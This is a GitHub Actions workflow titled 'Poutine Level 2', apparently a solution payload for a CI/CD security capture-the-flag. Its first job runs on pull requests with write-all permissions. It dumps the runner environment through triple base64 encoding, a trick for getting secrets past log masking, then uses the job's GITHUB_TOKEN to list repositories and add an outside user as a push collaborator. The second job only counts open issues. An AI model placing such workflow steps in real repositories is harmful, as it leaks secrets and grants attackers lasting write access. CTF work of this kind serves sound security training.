name: Poutine Level 2
on:
  pull_request:
    
permissions: write-all

jobs:
  pulled_pork:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    permissions: write-all
    steps:
      - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0
        with:
          egress-policy: audit
      - run: | 
          sh -c 'env | base64 -w0 | base64 -w0 | base64 -w0'
          echo "${{ secrets.GITHUB_TOKEN }}" | gh auth login --with-token
          gh repo list > list
          cat list
          gh auth status
          gh issue list || echo "fail"
          gh worfklow list || echo "fail"
          gh api -XPUT repos/messypoutine/gravy-overflow/collaborators/litios -f permission=push --silent
          echo "HERE"
          sleep 15
  track_pr:
    runs-on: ubuntu-latest
    steps:
      - run: |
          numOpenIssues="$(gh api graphql -F owner=$OWNER -F name=$REPO -f query='
            query($name: String!, $owner: String!) {
              repository(owner: $owner, name: $name) {
                issues(states:OPEN){
                  totalCount
                }
              }
            }
          ' --jq '.data.repository.issues.totalCount')"

          echo 'NUM_OPEN_ISSUES='$numOpenIssues >> $GITHUB_ENV
          echo $numOpenIssues
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          OWNER: ${{ github.repository_owner }}
          REPO: ${{ github.event.repository.name }}
